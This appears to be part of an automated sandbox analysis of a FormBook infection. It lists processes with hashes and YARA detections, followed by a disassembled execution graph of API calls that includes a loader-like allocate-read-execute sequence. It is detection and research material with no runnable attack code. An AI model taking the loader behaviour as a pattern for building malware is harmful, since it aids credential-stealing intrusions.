                                                                                                                  Path:C:\Windows\SysWOW64\RmClient.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\SysWOW64\RmClient.exe"
                                                                                                                  Imagebase:0xc30000
                                                                                                                  File size:15'360 bytes
                                                                                                                  MD5 hash:CE765DCC7CDFDC1BFD94CCB772C75E41
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:09:37:43
                                                                                                                  Start date:08/10/2024
                                                                                                                  Path:C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:140'800 bytes
                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:37:55
                                                                                                                  Start date:08/10/2024
                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                  Imagebase:0x7ff79f9e0000
                                                                                                                  File size:676'768 bytes
                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                    Signature Coverage:8.9%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:37
                                                                                                                    execution_graph 86055 4010e0 86058 401100 86055->86058 86057 4010f8 86059 401113 86058->86059 86060 401184 86059->86060 86061 40114c 86059->86061 86063 401120 86059->86063 86090 401182 86059->86090 86096 401250 61 API calls __crtGetStringTypeA_stat 86060->86096 86064 401151 86061->86064 86065 40119d 86061->86065 86062 40112c DefWindowProcW 86062->86057 86063->86062 86103 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86063->86103 86067 401219 86064->86067 86068 40115d 86064->86068 86070 4011a3 86065->86070 86071 42afb4 86065->86071 86067->86063 86074 401225 86067->86074 86072 401163 86068->86072 86073 42b01d 86068->86073 86069 401193 86069->86057 86070->86063 86080 4011b6 KillTimer 86070->86080 86081 4011db SetTimer RegisterWindowMessageW 86070->86081 86098 40f190 10 API calls 86071->86098 86077 42afe9 86072->86077 86078 40116c 86072->86078 86073->86062 86102 4370f4 52 API calls 86073->86102 86114 468b0e 74 API calls __crtGetStringTypeA_stat 86074->86114 86100 40f190 10 API calls 86077->86100 86078->86063 86084 401174 86078->86084 86079 42b04f 86104 40e0c0 86079->86104 86097 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86080->86097 86081->86069 86082 401204 CreatePopupMenu 86081->86082 86082->86057 86099 45fd57 65 API calls __crtGetStringTypeA_stat 86084->86099 86089 4011c9 PostQuitMessage 86089->86057 86090->86062 86091 42afe4 86091->86069 86092 42b00e 86101 401a50 331 API calls 86092->86101 86095 42afdc 86095->86062 86095->86091 86096->86069 86097->86089 86098->86069 86099->86095 86100->86092 86101->86090 86102->86090 86103->86079 86105 40e0e7 __crtGetStringTypeA_stat 86104->86105 86106 40e142 86105->86106 86108 42729f DestroyIcon 86105->86108 86107 40e184 86106->86107 86137 4341e6 63 API calls __wcsicoll 86106->86137 86110 40e1a0 Shell_NotifyIconW 86107->86110 86111 4272db Shell_NotifyIconW 86107->86111 86108->86106 86115 401b80 86110->86115 86113 40e1ba 86113->86090 86114->86091 86116 401b9c 86115->86116 86136 401c7e 86115->86136 86138 4013c0 86116->86138 86119 42722b LoadStringW 86122 427246 86119->86122 86120 401bb9 86143 402160 86120->86143 86157 40e0a0 86122->86157 86123 401bcd 86125 427258 86123->86125 86126 401bda 86123->86126 86161 40d200 52 API calls 2 library calls 86125->86161 86126->86122 86128 401be4 86126->86128 86127 401bf3 _wcscpy __crtGetStringTypeA_stat _wcsncpy 86135 401c62 Shell_NotifyIconW 86127->86135 86156 40d200 52 API calls 2 library calls 86128->86156 86131 427267 86131->86127 86132 42727b 86131->86132 86162 40d200 52 API calls 2 library calls 86132->86162 86134 427289 86135->86136 86136->86113 86137->86107 86163 4115d7 86138->86163 86144 426daa 86143->86144 86145 40216b _wcslen 86143->86145 86201 40c600 86144->86201 86148 402180 86145->86148 86149 40219e 86145->86149 86147 426db5 86147->86123 86200 403bd0 52 API calls ctype 86148->86200 86150 4013a0 52 API calls 86149->86150 86152 4021a5 86150->86152 86154 426db7 86152->86154 86155 4115d7 52 API calls 86152->86155 86153 402187 _memmove 86153->86123 86155->86153 86156->86127 86158 40e0b2 86157->86158 86159 40e0a8 86157->86159 86158->86127 86213 403c30 52 API calls _memmove 86159->86213 86161->86131 86162->86134 86165 4115e1 _malloc 86163->86165 86166 4013e4 86165->86166 86168 4115fd std::exception::exception 86165->86168 86177 4135bb 86165->86177 86174 4013a0 86166->86174 86172 41163b 86168->86172 86191 41130a 51 API calls __cinit 86168->86191 86169 411645 86193 418105 RaiseException 86169->86193 86192 4180af 46 API calls std::exception::operator= 86172->86192 86173 411656 86175 4115d7 52 API calls 86174->86175 86176 4013a7 86175->86176 86176->86119 86176->86120 86178 413638 _malloc 86177->86178 86181 4135c9 _malloc 86177->86181 86199 417f77 46 API calls __getptd_noexit 86178->86199 86179 4135d4 86179->86181 86194 418901 46 API calls 2 library calls 86179->86194 86195 418752 46 API calls 8 library calls 86179->86195 86196 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86179->86196 86181->86179 86183 4135f7 RtlAllocateHeap 86181->86183 86186 413624 86181->86186 86189 413622 86181->86189 86183->86181 86184 413630 86183->86184 86184->86165 86197 417f77 46 API calls __getptd_noexit 86186->86197 86198 417f77 46 API calls __getptd_noexit 86189->86198 86191->86172 86192->86169 86193->86173 86194->86179 86195->86179 86197->86189 86198->86184 86199->86184 86200->86153 86202 40c619 86201->86202 86203 40c60a 86201->86203 86202->86147 86203->86202 86206 4026f0 86203->86206 86205 426d7a _memmove 86205->86147 86207 426873 86206->86207 86208 4026ff 86206->86208 86209 4013a0 52 API calls 86207->86209 86208->86205 86210 42687b 86209->86210 86211 4115d7 52 API calls 86210->86211 86212 42689e _memmove 86211->86212 86212->86205 86213->86158 86214 40bd20 86215 428194 86214->86215 86216 40bd2d 86214->86216 86218 40bd43 86215->86218 86219 4281bc 86215->86219 86221 4281b2 86215->86221 86217 40bd37 86216->86217 86237 4531b1 85 API calls 5 library calls 86216->86237 86226 40bd50 86217->86226 86236 45e987 86 API calls ctype 86219->86236 86235 40b510 VariantClear 86221->86235 86225 4281ba 86227 426cf1 86226->86227 86228 40bd63 86226->86228 86247 44cde9 52 API calls _memmove 86227->86247 86238 40bd80 86228->86238 86231 40bd73 86231->86218 86232 426cfc 86233 40e0a0 52 API calls 86232->86233 86234 426d02 86233->86234 86235->86225 86236->86216 86237->86217 86239 40bd8e 86238->86239 86246 40bdb7 _memmove 86238->86246 86240 40bded 86239->86240 86241 40bdad 86239->86241 86239->86246 86243 4115d7 52 API calls 86240->86243 86248 402f00 86241->86248 86244 40bdf6 86243->86244 86245 4115d7 52 API calls 86244->86245 86244->86246 86245->86246 86246->86231 86247->86232 86249 402f0c 86248->86249 86250 402f10 86248->86250 86249->86246 86251 4115d7 52 API calls 86250->86251 86252 4268c3 86250->86252 86253 402f51 ctype _memmove 86251->86253 86253->86246 86254 425ba2 86259 40e360 86254->86259 86256 425bb4 86275 41130a 51 API calls __cinit 86256->86275 86258 425bbe 86260 4115d7 52 API calls 86259->86260 86261 40e3ec GetModuleFileNameW 86260->86261 86276 413a0e 86261->86276 86263 40e421 _wcsncat 86279 413a9e 86263->86279 86266 4115d7 52 API calls 86267 40e45e _wcscpy 86266->86267 86282 40bc70 86267->86282 86271 40e4a9 86271->86256 86272 40e4a1 _wcscat _wcslen _wcsncpy 86272->86271 86273 4115d7 52 API calls 86272->86273 86274 401c90 52 API calls 86272->86274 86273->86272 86274->86272 86275->86258 86301 413801 86276->86301 86331 419efd 86279->86331 86283 4115d7 52 API calls 86282->86283 86284 40bc98 86283->86284 86285 4115d7 52 API calls 86284->86285 86286 40bca6 86285->86286 86287 40e4c0 86286->86287 86343 403350 86287->86343 86289 40e4cb RegOpenKeyExW 86290 427190 RegQueryValueExW 86289->86290 86291 40e4eb 86289->86291 86292 4271b0 86290->86292 86293 42721a RegCloseKey 86290->86293 86291->86272 86294 4115d7 52 API calls 86292->86294 86293->86272 86295 4271cb 86294->86295 86350 43652f 52 API calls 86295->86350 86297 4271d8 RegQueryValueExW 86298 42720e 86297->86298 86299 4271f7 86297->86299 86298->86293 86300 402160 52 API calls 86299->86300 86300->86298 86302 41389e 86301->86302 86308 41381a 86301->86308 86303 4139e8 86302->86303 86305 413a00 86302->86305 86328 417f77 46 API calls __getptd_noexit 86303->86328 86330 417f77 46 API calls __getptd_noexit 86305->86330 86306 4139ed 86329 417f25 10 API calls _xtow_s@20 86306->86329 86308->86302 86316 41388a 86308->86316 86323 419e30 46 API calls _xtow_s@20 86308->86323 86310 413967 86310->86263 86312 413909 86313 41396c 86312->86313 86314 413929 86312->86314 86313->86302 86313->86310 86317 41397a 86313->86317 86314->86302 86315 413945 86314->86315 86325 419e30 46 API calls _xtow_s@20 86314->86325 86315->86302 86315->86310 86320 41395b 86315->86320 86316->86302 86316->86312 86324 419e30 46 API calls _xtow_s@20 86316->86324 86327 419e30 46 API calls _xtow_s@20 86317->86327 86326 419e30 46 API calls _xtow_s@20 86320->86326 86323->86316 86324->86312 86325->86315 86326->86310 86327->86310 86328->86306 86329->86310 86330->86310 86332 419f13 86331->86332 86333 419f0e 86331->86333 86340 417f77 46 API calls __getptd_noexit 86332->86340 86333->86332 86339 419f2b 86333->86339 86335 419f18 86341 417f25 10 API calls _xtow_s@20 86335->86341 86338 40e454 86338->86266 86339->86338 86342 417f77 46 API calls __getptd_noexit 86339->86342 86340->86335 86341->86338 86342->86335 86344 403367 86343->86344 86345 403358 86343->86345 86346 4115d7 52 API calls 86344->86346 86345->86289 86347 403370 86346->86347 86348 4115d7 52 API calls 86347->86348 86349 40339e 86348->86349 86349->86289 86350->86297 86351 4209973 86352 420997a 86351->86352 86353 4209982 86352->86353 86354 4209a18 86352->86354 86358 4209628 86353->86358 86371 420a2c8 9 API calls 86354->86371 86357 42099ff 86372 4207018 86358->86372 86361 42096f8 CreateFileW 86363 4209705 86361->86363 86368 42096c7 86361->86368 86362 4209721 VirtualAlloc 86362->86363 86364 4209742 ReadFile 86362->86364 86366 4209922 86363->86366 86367 4209914 VirtualFree 86363->86367 86364->86363 86365 4209760 VirtualAlloc 86364->86365 86365->86363 86365->86368 86366->86357 86367->86366 86368->86362 86368->86363 86369 4209828 CloseHandle 86368->86369 86370 4209838 VirtualFree 86368->86370 86375 420a538 GetPEB 86368->86375 86369->86368 86370->86368 86371->86357 86377 420a4d8 GetPEB 86372->86377 86374 42076a3 86374->86368 86376 420a562 86375->86376 86376->86361 86378 420a502 86377->86378 86378->86374 86379 416454 86416 416c70 86379->86416 86381 416460 GetStartupInfoW 86382 416474 86381->86382 86417 419d5a HeapCreate 86382->86417 86384 4164cd 86385 4164d8 86384->86385 86501 41642b 46 API calls 3 library calls 86384->86501 86418 417c20 GetModuleHandleW 86385->86418 86388 4164de 86389 4164e9 __RTC_Initialize 86388->86389 86502 41642b 46 API calls 3 library calls 86388->86502 86437 41aaa1 GetStartupInfoW 86389->86437 86393 416503 GetCommandLineW 86450 41f584 GetEnvironmentStringsW 86393->86450 86396 416513 86456 41f4d6 GetModuleFileNameW 86396->86456 86399 41651d 86400 416528 86399->86400 86504 411924 46 API calls 3 library calls 86399->86504 86460 41f2a4 86400->86460 86403 41652e 86404 416539 86403->86404 86505 411924 46 API calls 3 library calls 86403->86505 86474 411703 86404->86474 86407 416541 86409 41654c __wwincmdln 86407->86409 86506 411924 46 API calls 3 library calls 86407->86506 86478 40d6b0 86409->86478 86412 41657c 86508 411906 46 API calls _doexit 86412->86508 86415 416581 _doexit 86416->86381 86417->86384 86419 417c34 86418->86419 86420 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86418->86420 86509 4178ff 49 API calls _free 86419->86509 86422 417c87 TlsAlloc 86420->86422 86425 417cd5 TlsSetValue 86422->86425 86426 417d96 86422->86426 86424 417c39 86424->86388 86425->86426 86427 417ce6 __init_pointers 86425->86427 86426->86388 86510 418151 InitializeCriticalSectionAndSpinCount 86427->86510 86429 417d91 86518 4178ff 49 API calls _free 86429->86518 86431 417d2a 86431->86429 86511 416b49 86431->86511 86434 417d76 86517 41793c 46 API calls 4 library calls 86434->86517 86436 417d7e GetCurrentThreadId 86436->86426 86438 416b49 __calloc_crt 46 API calls 86437->86438 86444 41aabf 86438->86444 86439 41ac6a GetStdHandle 86445 41ac34 86439->86445 86440 41acce SetHandleCount 86449 4164f7 86440->86449 86441 416b49 __calloc_crt 46 API calls 86441->86444 86442 41ac7c GetFileType 86442->86445 86443 41abb4 86443->86445 86446 41abe0 GetFileType 86443->86446 86447 41abeb InitializeCriticalSectionAndSpinCount 86443->86447 86444->86441 86444->86443 86444->86445 86444->86449 86445->86439 86445->86440 86445->86442 86448 41aca2 InitializeCriticalSectionAndSpinCount 86445->86448 86446->86443 86446->86447 86447->86443 86447->86449 86448->86445 86448->86449 86449->86393 86503 411924 46 API calls 3 library calls 86449->86503 86451 41f595 86450->86451 86452 41f599 86450->86452 86451->86396 86528 416b04 86452->86528 86454 41f5bb _memmove 86455 41f5c2 FreeEnvironmentStringsW 86454->86455 86455->86396 86457 41f50b _wparse_cmdline 86456->86457 86458 416b04 __malloc_crt 46 API calls 86457->86458 86459 41f54e _wparse_cmdline 86457->86459 86458->86459 86459->86399 86461 41f2bc _wcslen 86460->86461 86465 41f2b4 86460->86465 86462 416b49 __calloc_crt 46 API calls 86461->86462 86467 41f2e0 _wcslen 86462->86467 86463 41f336 86535 413748 86463->86535 86465->86403 86466 416b49 __calloc_crt 46 API calls 86466->86467 86467->86463 86467->86465 86467->86466 86468 41f35c 86467->86468 86471 41f373 86467->86471 86534 41ef12 46 API calls _xtow_s@20 86467->86534 86469 413748 _free 46 API calls 86468->86469 86469->86465 86541 417ed3 86471->86541 86473 41f37f 86473->86403 86475 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86474->86475 86477 411750 __IsNonwritableInCurrentImage 86475->86477 86560 41130a 51 API calls __cinit 86475->86560 86477->86407 86479 42e2f3 86478->86479 86480 40d6cc 86478->86480 86561 408f40 86480->86561 86482 40d707 86565 40ebb0 86482->86565 86485 40d737 86568 411951 86485->86568 86490 40d751 86580 40f4e0 SystemParametersInfoW SystemParametersInfoW 86490->86580 86492 40d75f 86581 40d590 GetCurrentDirectoryW 86492->86581 86494 40d767 SystemParametersInfoW 86495 40d794 86494->86495 86496 40d78d FreeLibrary 86494->86496 86497 408f40 VariantClear 86495->86497 86496->86495 86498 40d79d 86497->86498 86499 408f40 VariantClear 86498->86499 86500 40d7a6 86499->86500 86500->86412 86507 4118da 46 API calls _doexit 86500->86507 86501->86385 86502->86389 86507->86412 86508->86415 86509->86424 86510->86431 86513 416b52 86511->86513 86514 416b8f 86513->86514 86515 416b70 Sleep 86513->86515 86519 41f677 86513->86519 86514->86429 86514->86434 86516 416b85 86515->86516 86516->86513 86516->86514 86517->86436 86518->86426 86520 41f683 86519->86520 86521 41f69e _malloc 86519->86521 86520->86521 86522 41f68f 86520->86522 86524 41f6b1 HeapAlloc 86521->86524 86526 41f6d8 86521->86526 86527 417f77 46 API calls __getptd_noexit 86522->86527 86524->86521 86524->86526 86525 41f694 86525->86513 86526->86513 86527->86525 86531 416b0d 86528->86531 86529 4135bb _malloc 45 API calls 86529->86531 86530 416b43 86530->86454 86531->86529 86531->86530 86532 416b24 Sleep 86531->86532 86533 416b39 86532->86533 86533->86530 86533->86531 86534->86467 86536 413753 RtlFreeHeap 86535->86536 86540 41377c _free 86535->86540 86537 413768 86536->86537 86536->86540 86544 417f77 46 API calls __getptd_noexit 86537->86544 86539 41376e GetLastError 86539->86540 86540->86465 86545 417daa 86541->86545 86544->86539 86546 417dc9 __crtGetStringTypeA_stat __call_reportfault 86545->86546 86547 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86546->86547 86550 417eb5 __call_reportfault 86547->86550 86549 417ed1 GetCurrentProcess TerminateProcess 86549->86473 86551 41a208 86550->86551 86552 41a210 86551->86552 86553 41a212 IsDebuggerPresent 86551->86553 86552->86549 86559 41fe19 86553->86559 86556 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86557 421ff0 __call_reportfault 86556->86557 86558 421ff8 GetCurrentProcess TerminateProcess 86556->86558 86557->86558 86558->86549 86559->86556 86560->86477 86562 408f48 ctype 86561->86562 86563 4265c7 VariantClear 86562->86563 86564 408f55 ctype 86562->86564 86563->86564 86564->86482 86621 40ebd0 86565->86621 86625 4182cb 86568->86625 86570 41195e 86632 4181f2 LeaveCriticalSection 86570->86632 86572 40d748 86573 4119b0 86572->86573 86574 4119d6 86573->86574 86575 4119bc 86573->86575 86574->86490 86575->86574 86667 417f77 46 API calls __getptd_noexit 86575->86667 86577 4119c6 86668 417f25 10 API calls _xtow_s@20 86577->86668 86579 4119d1 86579->86490 86580->86492 86669 401f20 86581->86669 86583 40d5b6 IsDebuggerPresent 86584 40d5c4 86583->86584 86585 42e1bb MessageBoxA 86583->86585 86586 42e1d4 86584->86586 86587 40d5e3 86584->86587 86585->86586 86841 403a50 52 API calls 3 library calls 86586->86841 86739 40f520 86587->86739 86591 40d5fd GetFullPathNameW 86751 401460 86591->86751 86593 40d63b 86594 40d643 86593->86594 86596 42e231 SetCurrentDirectoryW 86593->86596 86595 40d64c 86594->86595 86842 432fee 6 API calls 86594->86842 86766 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86595->86766 86596->86594 86599 42e252 86599->86595 86601 42e25a GetModuleFileNameW 86599->86601 86603 42e274 86601->86603 86604 42e2cb GetForegroundWindow ShellExecuteW 86601->86604 86843 401b10 86603->86843 86608 40d688 86604->86608 86605 40d656 86607 40d669 86605->86607 86610 40e0c0 74 API calls 86605->86610 86774 4091e0 86607->86774 86612 40d692 SetCurrentDirectoryW 86608->86612 86610->86607 86612->86494 86615 42e28d 86850 40d200 52 API calls 2 library calls 86615->86850 86618 42e299 GetForegroundWindow ShellExecuteW 86619 42e2c6 86618->86619 86619->86608 86620 40ec00 LoadLibraryA GetProcAddress 86620->86485 86622 40d72e 86621->86622 86623 40ebd6 LoadLibraryA 86621->86623 86622->86485 86622->86620 86623->86622 86624 40ebe7 GetProcAddress 86623->86624 86624->86622 86626 4182e0 86625->86626 86627 4182f3 EnterCriticalSection 86625->86627 86633 418209 86626->86633 86627->86570 86629 4182e6 86629->86627 86660 411924 46 API calls 3 library calls 86629->86660 86632->86572 86634 418215 _doexit 86633->86634 86635 418225 86634->86635 86636 41823d 86634->86636 86661 418901 46 API calls 2 library calls 86635->86661 86639 416b04 __malloc_crt 45 API calls 86636->86639 86642 41824b _doexit 86636->86642 86638 41822a 86662 418752 46 API calls 8 library calls 86638->86662 86641 418256 86639->86641 86644 41825d 86641->86644 86645 41826c 86641->86645 86642->86629 86643 418231 86663 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86643->86663 86664 417f77 46 API calls __getptd_noexit 86644->86664 86646 4182cb __lock 45 API calls 86645->86646 86649 418273 86646->86649 86651 4182a6 86649->86651 86652 41827b InitializeCriticalSectionAndSpinCount 86649->86652 86655 413748 _free 45 API calls 86651->86655 86653 418297 86652->86653 86654 41828b 86652->86654 86666 4182c2 LeaveCriticalSection _doexit 86653->86666 86656 413748 _free 45 API calls 86654->86656 86655->86653 86657 418291 86656->86657 86665 417f77 46 API calls __getptd_noexit 86657->86665 86661->86638 86662->86643 86664->86642 86665->86653 86666->86642 86667->86577 86668->86579 86851 40e6e0 86669->86851 86673 401f41 GetModuleFileNameW 86869 410100 86673->86869 86675 401f5c 86881 410960 86675->86881 86678 401b10 52 API calls 86679 401f81 86678->86679 86884 401980 86679->86884 86681 401f8e 86682 408f40 VariantClear 86681->86682 86683 401f9d 86682->86683 86684 401b10 52 API calls 86683->86684 86685 401fb4 86684->86685 86686 401980 53 API calls 86685->86686 86687 401fc3 86686->86687 86688 401b10 52 API calls 86687->86688 86689 401fd2 86688->86689 86892 40c2c0 86689->86892 86691 401fe1 86692 40bc70 52 API calls 86691->86692 86693 401ff3 86692->86693 86910 401a10 86693->86910 86695 401ffe 86917 4114ab 86695->86917 86698 428b05 86700 401a10 52 API calls 86698->86700 86699 402017 86701 4114ab __wcsicoll 58 API calls 86699->86701 86703 428b18 86700->86703 86702 402022 86701->86702 86702->86703 86704 40202d 86702->86704 86705 401a10 52 API calls 86703->86705 86706 4114ab __wcsicoll 58 API calls 86704->86706 86707 428b33 86705->86707 86708 402038 86706->86708 86710 428b3b GetModuleFileNameW 86707->86710 86709 402043 86708->86709 86708->86710 86711 4114ab __wcsicoll 58 API calls 86709->86711 86712 401a10 52 API calls 86710->86712 86713 40204e 86711->86713 86714 428b6c 86712->86714 86715 402092 86713->86715 86720 401a10 52 API calls 86713->86720 86722 428b90 _wcscpy 86713->86722 86716 40e0a0 52 API calls 86714->86716 86717 4020a3 86715->86717 86715->86722 86718 428b7a 86716->86718 86719 428bc6 86717->86719 86925 40e830 53 API calls 86717->86925 86721 401a10 52 API calls 86718->86721 86724 402073 _wcscpy 86720->86724 86725 428b88 86721->86725 86726 401a10 52 API calls 86722->86726 86730 401a10 52 API calls 86724->86730 86725->86722 86734 4020d0 86726->86734 86727 4020bb 86926 40cf00 53 API calls 86727->86926 86729 4020c6 86731 408f40 VariantClear 86729->86731 86730->86715 86731->86734 86732 402110 86736 408f40 VariantClear 86732->86736 86734->86732 86737 401a10 52 API calls 86734->86737 86927 40cf00 53 API calls 86734->86927 86928 40e6a0 53 API calls 86734->86928 86738 402120 ctype 86736->86738 86737->86734 86738->86583 86740 40f53c 86739->86740 86742 4295c9 __crtGetStringTypeA_stat 86739->86742 87607 410120 86740->87607 86744 4295d9 GetOpenFileNameW 86742->86744 86743 40f545 87611 4102b0 SHGetMalloc 86743->87611 86744->86740 86746 40d5f5 86744->86746 86746->86591 86746->86593 86747 40f54c 87616 410190 GetFullPathNameW 86747->87616 86749 40f559 87627 40f570 86749->87627 87689 402400 86751->87689 86753 40146f 86757 428c29 _wcscat 86753->86757 87698 401500 86753->87698 86755 40147c 86755->86757 87706 40d440 86755->87706 86758 401489 86758->86757 86759 401491 GetFullPathNameW 86758->86759 86760 402160 52 API calls 86759->86760 86761 4014bb 86760->86761 86762 402160 52 API calls 86761->86762 86763 4014c8 86762->86763 86763->86757 86764 402160 52 API calls 86763->86764 86765 4014ee 86764->86765 86765->86593 86767 428361 86766->86767 86768 4103fc LoadImageW RegisterClassExW 86766->86768 87726 44395e EnumResourceNamesW LoadImageW 86767->87726 87725 410490 7 API calls 86768->87725 86771 40d651 86773 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86771->86773 86772 428368 86773->86605 86775 409202 86774->86775 86776 42d7ad 86774->86776 86831 409216 ctype 86775->86831 87989 410940 331 API calls 86775->87989 87992 45e737 90 API calls 3 library calls 86776->87992 86779 409386 86780 40939c 86779->86780 87990 40f190 10 API calls 86779->87990 86780->86608 86840 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86780->86840 86782 4095b2 86782->86780 86784 4095bf 86782->86784 86783 409253 PeekMessageW 86783->86831 87991 401a50 331 API calls 86784->87991 86785 40d410 VariantClear 86785->86831 86787 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86787->86780 86789 4095f9 86787->86789 86788 42d8cd Sleep 86788->86831 86793 42e158 TranslateMessage DispatchMessageW GetMessageW 86789->86793 86791 42e13b 88010 40d410 VariantClear 86791->88010 86793->86793 86795 42e188 86793->86795 86795->86780 86797 409567 PeekMessageW 86797->86831 86799 44c29d 52 API calls 86839 4094e0 86799->86839 86800 46f3c1 107 API calls 86800->86831 86801 40e0a0 52 API calls 86801->86831 86802 46fdbf 108 API calls 86802->86839 86803 409551 TranslateMessage DispatchMessageW 86803->86797 86805 42dcd2 WaitForSingleObject 86806 42dcf0 GetExitCodeProcess CloseHandle 86805->86806 86805->86831 87999 40d410 VariantClear 86806->87999 86808 42dd3d Sleep 86808->86839 86811 4094cf Sleep 86811->86839 86813 42d94d timeGetTime 87995 465124 53 API calls 86813->87995 86815 40c620 timeGetTime 86815->86839 86818 42dd89 CloseHandle 86818->86839 86819 47d33e 309 API calls 86819->86831 86821 408f40 VariantClear 86821->86839 86822 465124 53 API calls 86822->86839 86823 42de19 GetExitCodeProcess CloseHandle 86823->86839 86826 42de88 Sleep 86826->86831 86831->86779 86831->86783 86831->86785 86831->86788 86831->86791 86831->86797 86831->86800 86831->86801 86831->86803 86831->86805 86831->86808 86831->86811 86831->86813 86831->86819 86832 42e0cc VariantClear 86831->86832 86833 45e737 90 API calls 86831->86833 86834 408f40 VariantClear 86831->86834 86831->86839 87727 4091b0 86831->87727 87785 40afa0 86831->87785 87811 408fc0 86831->87811 87846 408cc0 86831->87846 87860 4096a0 86831->87860 87987 40d150 TranslateAcceleratorW 86831->87987 87988 40d170 IsDialogMessageW GetClassLongW 86831->87988 87993 465124 53 API calls 86831->87993 87994 40c620 timeGetTime 86831->87994 88009 40e270 VariantClear ctype 86831->88009 86832->86831 86833->86831 86834->86831 86836 401980 53 API calls 86836->86839 86837 401b10 52 API calls 86837->86839 86839->86799 86839->86802 86839->86815 86839->86818 86839->86821 86839->86822 86839->86823 86839->86826 86839->86831 86839->86836 86839->86837 87996 45178a 54 API calls 86839->87996 87997 47d33e 331 API calls 86839->87997 87998 453bc6 54 API calls 86839->87998 88000 40d410 VariantClear 86839->88000 88001 443d19 67 API calls _wcslen 86839->88001 88002 4574b4 VariantClear 86839->88002 88003 403cd0 86839->88003 88007 4731e1 VariantClear 86839->88007 88008 4331a2 6 API calls 86839->88008 86840->86608 86841->86593 86842->86599 86844 401b16 _wcslen 86843->86844 86845 4115d7 52 API calls 86844->86845 86848 401b63 86844->86848 86846 401b4b _memmove 86845->86846 86847 4115d7 52 API calls 86846->86847 86847->86848 86849 40d200 52 API calls 2 library calls 86848->86849 86849->86615 86850->86618 86852 40bc70 52 API calls 86851->86852 86853 401f31 86852->86853 86854 402560 86853->86854 86855 40256d __write_nolock 86854->86855 86856 402160 52 API calls 86855->86856 86858 402593 86856->86858 86865 4025bd 86858->86865 86929 401c90 86858->86929 86859 4026f0 52 API calls 86859->86865 86860 4026a7 86861 401b10 52 API calls 86860->86861 86868 4026db 86860->86868 86863 4026d1 86861->86863 86862 401b10 52 API calls 86862->86865 86933 40d7c0 52 API calls 2 library calls 86863->86933 86864 401c90 52 API calls 86864->86865 86865->86859 86865->86860 86865->86862 86865->86864 86932 40d7c0 52 API calls 2 library calls 86865->86932 86868->86673 86934 40f760 86869->86934 86872 410118 86872->86675 86874 42805d 86875 42806a 86874->86875 86990 431e58 86874->86990 86877 413748 _free 46 API calls 86875->86877 86878 428078 86877->86878 86879 431e58 82 API calls 86878->86879 86880 428084 86879->86880 86880->86675 86882 4115d7 52 API calls 86881->86882 86883 401f74 86882->86883 86883->86678 86885 4019a3 86884->86885 86890 401985 86884->86890 86886 4019b8 86885->86886 86885->86890 87596 403e10 53 API calls 86886->87596 86888 40199f 86888->86681 86889 4019c4 86889->86681 86890->86888 87595 403e10 53 API calls 86890->87595 86893 40c2c7 86892->86893 86894 40c30e 86892->86894 86897 40c2d3 86893->86897 86898 426c79 86893->86898 86895 40c315 